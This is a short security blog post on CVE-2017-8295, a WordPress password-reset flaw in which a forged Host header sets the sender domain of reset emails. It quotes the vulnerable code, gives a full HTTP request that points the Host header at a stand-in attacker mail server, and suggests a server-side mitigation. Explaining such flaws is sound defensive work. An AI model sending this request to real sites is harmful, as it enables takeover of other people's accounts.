All versions of WordPress are vulnerable

All versions of WordPress are vulnerable

[vc_row type=”in_container” full_screen_row_position=”middle” scene_position=”center” text_color=”dark” text_align=”left” overlay_strength=”0.3″][vc_column column_padding=”no-extra-padding” column_padding_position=”all” background_color_opacity=”1″ background_hover_color_opacity=”1″ column_shadow=”none” width=”2/3″ tablet_text_alignment=”default” phone_text_alignment=”default” column_border_width=”none” column_border_style=”solid”]

Yes, as the tittle says… All versions of WordPress are vulnerable to a ZeroDay that can reset the passwords

On May 3, a new vulnerability (CVE-2017-8295) was released that affects all versions of WordPress (WP), including the latest version 4.7.4, which can allow an attacker to remotely reset the password and access with Any user which puts at your disposal and total control the web.

The vulnerability is on the password reset request page, specifically the possibility of modifying the contents of the SERVER_NAME variable in the wp-includes / pluggable.php:

if ( !isset( $from_email ) ) {

        // Get the site domain and get rid of www.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                $sitename = substr( $sitename, 4 );
        }

$from_email = 'wordpress@' . $sitename; }

WordPress uses the variable SERVER_NAME to form the From / Return-Path header of the mail. The problem is that most web servers, like Apache, default to SERVER_NAME with the hostname provided by the client (inside the HTTP_HOST header):

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

As SERVER_NAME can be modified, the Host can be changed in the header:

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

And the result is that $ from_email in WordPress will be: wordpress@attackers-mxserver.com

This will generate outgoing mail with that address in From / Return-Path.

In short, if the administrator or the e-mail address of any destination user is known, the password reset link can be obtained by these or other methods and, therefore, reset the password of any user’s account. At the moment there is no official solution, but to remedy the problem it is recommended to force a static name into UseCanonicalName.

Update: As can be seen, a social engineering component is needed to trick the victim into clicking on the link received.

 

Reference:
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

WordPress, bug, error, admin, wp, reset, password, learn, learning, the best security practice, ethical hacking, IT, Admin, Administrator, Server, User, Kali Linux, Phone, Download, Blog, WordPress, Free, Lab, Pentest, Pentester

[/vc_column][vc_column column_padding=”no-extra-padding” column_padding_position=”all” background_color_opacity=”1″ background_hover_color_opacity=”1″ column_shadow=”none” width=”1/3″ tablet_text_alignment=”default” phone_text_alignment=”default” column_border_width=”none” column_border_style=”solid” offset=”vc_hidden-md vc_hidden-sm vc_hidden-xs”]
[image_with_animation image_url=”6315″ alignment=”center” animation=”Fade In” box_shadow=”none” max_width=”100%” delay=”300″][team_member image_url=”1722″ team_memeber_style=”meta_below” link_element=”none” color=”Accent-Color” name=”Daniel Morales” job_position=”Writer”][/vc_column][/vc_row][vc_row type=”full_width_background” full_screen_row_position=”middle” bg_color=”#f9f9f9″ scene_position=”center” text_color=”dark” text_align=”left” top_padding=”4%” bottom_padding=”3%” overlay_strength=”0.3″][vc_column column_padding=”no-extra-padding” column_padding_position=”all” background_color_opacity=”1″ background_hover_color_opacity=”1″ column_shadow=”none” width=”1/1″ tablet_text_alignment=”default” phone_text_alignment=”default” column_border_width=”none” column_border_style=”solid”][recent_posts style=”default” category=”all” columns=”3″ title_labels=”true” posts_per_page=”3″][/vc_column][/vc_row][vc_row type=”in_container” full_screen_row_position=”middle” scene_position=”center” text_color=”dark” text_align=”left” overlay_strength=”0.3″][vc_column column_padding=”no-extra-padding” column_padding_position=”all” background_color_opacity=”1″ background_hover_color_opacity=”1″ column_shadow=”none” width=”1/1″ tablet_text_alignment=”default” phone_text_alignment=”default” column_border_width=”none” column_border_style=”solid”][/vc_column][/vc_row]

Share it:

Leave a Reply

Your email address will not be published. Required fields are marked *